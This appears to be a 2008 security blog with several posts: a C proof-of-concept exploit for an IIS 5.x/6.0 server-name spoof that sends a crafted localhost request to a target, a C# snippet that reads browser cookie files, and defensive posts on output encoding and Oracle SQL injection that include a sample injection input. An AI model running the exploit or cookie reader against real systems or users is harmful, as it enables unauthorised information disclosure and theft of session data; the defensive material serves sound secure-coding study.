Wednesday, December 3, 2008

Code to read the information of the hosted server

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"ws2_32.lib")
/* max size of the socket buffer */
#define LEN_BUF 2048

/* connect to a host through a port; returns INVALID_SOCKET on error */
SOCKET Conecta(char *Host, short puerto);

int main(int argc, char *argv[])
{
    /* socket from the connection */
    SOCKET sock;
    /* buffer for the data received */
    char buf[LEN_BUF];
    int n;
    FILE *data;

    printf("\n Proof of Concept");
    printf("\n IIS 5.x and IIS 6.0 Server Name Spoof - by Lympex");
    printf("\nContact: lympex[at]gmail[dot]com - http://l-bytes.tk");
    printf("\n----------------------------------------------------\n");

    if(argc!=4)
    {
        printf("\n[+] Usage: %s server.com 80 /test.asp\n",argv[0]);
        return 1;
    }

    /* connect (WSAStartup is done inside Conecta) */
    sock=Conecta(argv[1],(short)atoi(argv[2]));

    if(sock==INVALID_SOCKET)
    {
        printf("\n[+] Error connecting to host\n");
        return 1;
    }
    printf("\n[+] Connected!\n");

    if((data=fopen("received_data.txt","w"))==NULL)
    {
        printf("\n[+] Error saving received data\n");
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    /* send the EVIL REQUEST: an absolute URI for localhost in the request line;
       snprintf bounds the copy so a long argv[3] cannot overflow buf */
    snprintf(buf,LEN_BUF,"GET http://localhost%s HTTP/1.0\r\n\r\n",argv[3]);
    if(send(sock,buf,(int)strlen(buf),0)==SOCKET_ERROR)
    {
        printf("\n[+] Error sending request\n");
        fclose(data);
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    /* read until the server closes the connection (recv returns 0) or fails (-1) */
    while((n=recv(sock,buf,LEN_BUF,0))>0)
    {
        fwrite(buf,1,n,data);
    }

    fclose(data);
    closesocket(sock);
    WSACleanup();
    printf("\n[+] Received data, saved in: \x22received_data.txt\x22\n");
    return 0;
}

/* Connect to a host through a port - by Lympex */
SOCKET Conecta(char *Host, short puerto)
{
    /* needed to create the socket */
    WSADATA wsaData;
    SOCKET Winsock;
    /* structure with the data needed for the connection */
    struct sockaddr_in Winsock_In;
    struct hostent *Ip;

    /* initialise Winsock */
    if(WSAStartup(MAKEWORD(2,2), &wsaData)!=0)
        return INVALID_SOCKET;
    /* create the socket */
    Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);

    /* check it is valid, so we do not fill in Winsock_In for nothing */
    if(Winsock==INVALID_SOCKET)
    {
        /* leave */
        WSACleanup();
        return INVALID_SOCKET;
    }

    /* resolve the host name */
    Ip=gethostbyname(Host);
    if(Ip==NULL)
    {
        closesocket(Winsock);
        WSACleanup();
        return INVALID_SOCKET;
    }

    /* fill in the structure */
    memset(&Winsock_In,0,sizeof(Winsock_In));
    Winsock_In.sin_family=AF_INET;
    Winsock_In.sin_port=htons(puerto);
    memcpy(&Winsock_In.sin_addr,Ip->h_addr,Ip->h_length);

    /* connect */
    if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        /* leave */
        closesocket(Winsock);
        WSACleanup();
        return INVALID_SOCKET;
    }

    return Winsock;
}

Tuesday, October 14, 2008

Reading Cookie

using System;
using System.Collections;
using System.IO;
using System.Windows.Forms;

public partial class Form1 : Form
{
    private void button1_Click(object sender, EventArgs e)
    {
        /* working code: just open the Cookies folder in Explorer
        string path = Environment.GetFolderPath(Environment.SpecialFolder.Cookies);
        System.Diagnostics.Process prc = new System.Diagnostics.Process();
        string windir = Environment.GetEnvironmentVariable("WINDIR");
        prc.StartInfo.FileName = windir + @"\explorer.exe";
        prc.StartInfo.Arguments = path;
        prc.Start();
        */
        string searchPattern = "*.txt";
        string InitDirectory = Environment.GetFolderPath(Environment.SpecialFolder.Cookies);
        ArrayList MyFiles = new ArrayList();
        DirectoryInfo di = new DirectoryInfo(InitDirectory);
        // Get Files (walks the Cookies folder and its subdirectories)
        GetFiles(di, searchPattern, ref MyFiles);
        // Print one of them; any index from 0 to MyFiles.Count - 1 can be used
        if (MyFiles.Count <= 4)
        {
            MessageBox.Show("Fewer than five cookie files found");
            return;
        }
        using (StreamReader read = new StreamReader(MyFiles[4].ToString()))
        {
            string st = read.ReadToEnd();
            MessageBox.Show(st);
        }
    }

    private void GetFiles(DirectoryInfo di, string searchPattern, ref ArrayList MyFiles)
    {
        foreach (FileInfo fi in di.GetFiles(searchPattern))
        {
            MyFiles.Add(fi.FullName);
        }
        // Search in subdirectories
        foreach (DirectoryInfo d in di.GetDirectories())
        {
            GetFiles(d, searchPattern, ref MyFiles);
        }
    }
}

Thursday, April 10, 2008

Code Review Checks

Check That Output Is Encoded

While not a replacement for checking that input is well-formed and correct, you should check that HtmlEncode is used to encode HTML output that includes any type of input. Also check that UrlEncode is used to encode URL strings. Input data can come from query strings, form fields, cookies, HTTP headers, and input read from a database, particularly if the database is shared by other applications. By encoding the data, you prevent the browser from treating the HTML as executable script.

Example of URL encoding:
String MyURL;
MyURL = "http://www.contoso.com/articles.aspx?title=" + Server.UrlEncode("ASP.NET Examples");

Response.Write("<a href=" + MyURL + "> ASP.NET Examples </a>");
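As an added example (not code from the original post), the same link built in Python, with urlencode standing in for Server.UrlEncode and html.escape for HtmlEncode. It goes one step further than the snippet above by also HTML-encoding the finished URL before placing it in the href attribute, so an '&' between query parameters becomes '&amp;' and a quote in the input cannot end the attribute; the consumer-side function shows that nothing is lost on the way back.

```python
import html
from urllib.parse import parse_qs, urlencode, urlparse

BASE = "http://www.contoso.com/articles.aspx"

def build_link(title, **extra):
    """Build the <a> element for articles.aspx?title=... safely.

    urlencode (space -> '+', like Server.UrlEncode) protects the query string,
    then html.escape (HtmlEncode) protects the attribute value and the link text.
    """
    url = BASE + "?" + urlencode({"title": title, **extra})
    return '<a href="%s">%s</a>' % (html.escape(url), html.escape(title))

def build_link_unencoded(title, **extra):
    """The same link with neither encoding, for comparison only."""
    query = "&".join("%s=%s" % kv for kv in [("title", title), *extra.items()])
    return '<a href="%s?%s">%s</a>' % (BASE, query, title)

def title_from_link(link):
    """Consumer side: pull the href out, undo HtmlEncode, then parse the query.

    Returns the title exactly as the user typed it, showing nothing was lost.
    """
    href = link.split('href="', 1)[1].split('"', 1)[0]
    return parse_qs(urlparse(html.unescape(href)).query)["title"][0]

def is_safely_encoded(link):
    """Crude check of the kind a code review looks for: no raw '<' inside the
    element and exactly the two quotes that delimit the href attribute."""
    inner = link[len('<a href="'):-len("</a>")]
    return "<" not in inner and link.count('"') == 2
```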

Check for Correct Character Encoding

To help prevent attackers from using canonicalization and multi-byte escape sequences to trick your input validation routines, check that the character encoding is set correctly, so that input can be represented in only a limited number of ways.

Check that the application Web.config file has the requestEncoding and responseEncoding attributes configured on the <globalization> element, as shown below.

<configuration>
  <system.web>
    <globalization
      requestEncoding="ISO-8859-1"
      responseEncoding="ISO-8859-1"/>
  </system.web>
</configuration>

Tuesday, March 25, 2008

Oracle Injection Example

PreparedStatement
The PreparedStatement interface is used to execute dynamic SQL statements. The standard JDBC PreparedStatement interface may be used, or OraclePreparedStatement may be used if Oracle-specific data types or other Oracle extensions are required.
A PreparedStatement that is vulnerable to SQL injection may look something like this –
String name = request.getParameter("name");
PreparedStatement pstmt =
    conn.prepareStatement("insert into EMP (ENAME) values ('" + name + "')");
pstmt.execute();
pstmt.close();
To prevent SQL injection, a bind variable must be used –
PreparedStatement pstmt =
    conn.prepareStatement("insert into EMP (ENAME) values (?)");
String name = request.getParameter("name");
pstmt.setString(1, name);
pstmt.execute();
pstmt.close();

Monday, March 24, 2008

Sql Injection in Oracle

Oracle is like any other database product and, as a result, is vulnerable to SQL injection attacks. While Oracle fares slightly better than some of the others, the following abuses can be inflicted on an Oracle database:

  • UNIONS can be added to an existing statement to execute a second statement;
  • SUBSELECTS can be added to existing statements;
  • Existing SQL can be short-circuited to bring back all data. This technique is often used to gain access via third-party-implemented authentication schemes;
  • A large selection of installed packages and procedures are available; these include packages to read and write O/S files;
  • Data Definition Language (DDL) can be injected if DDL is used in a dynamic SQL string;
  • INSERTS, UPDATES and DELETES can also be injected; and,
  • Other databases can be injected through the first by using database links.

On the other hand, the following abuses are not possible:

  • Multiple statements are not allowed; and,
  • It is also not possible to SQL inject a call that uses bind variables; this is therefore a good solution to most of the SQL injection issues.
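As an added example (not code from either post), the vulnerable and bind-variable inserts from the Oracle Injection Example above, run side by side in Python; it serves both that post and the bind-variable point in this one. sqlite3 is assumed as a stand-in for Oracle because it matches on the two points that matter here: one statement per call, and || for string concatenation. The constructed input splices a SUBSELECT, one of the abuses listed above, into the concatenated statement, while the bind variable stores it as plain text.

```python
import sqlite3

def fresh_db():
    """Constructed sample schema: the EMP table from the post with one row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table EMP (ENAME varchar2(50))")
    conn.execute("insert into EMP (ENAME) values ('SCOTT')")
    return conn

def insert_concat(conn, name):
    """The vulnerable form: the request value is pasted into the SQL text,
    so quotes and || in the value become part of the statement."""
    conn.execute("insert into EMP (ENAME) values ('" + name + "')")

def insert_bind(conn, name):
    """The fixed form: a bind variable, the '?' of pstmt.setString(1, name);
    the database never parses the value as SQL."""
    conn.execute("insert into EMP (ENAME) values (?)", (name,))

def names(conn):
    """All ENAME values in insertion order."""
    return [row[0] for row in conn.execute("select ENAME from EMP order by rowid")]

# Constructed input: closes the string literal and splices in a subselect.
SUBSELECT_INPUT = "x' || (select ENAME from EMP where rowid = 1) || 'y"

def demo(value=SUBSELECT_INPUT):
    """Return (what concatenation stored, what the bind variable stored)."""
    concat_db = fresh_db()
    insert_concat(concat_db, value)
    bind_db = fresh_db()
    insert_bind(bind_db, value)
    return names(concat_db)[1], names(bind_db)[1]
```

With the concatenated statement the subselect runs and the stored name is "xSCOTTy"; with the bind variable the stored name is the input string itself.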

Tuesday, March 4, 2008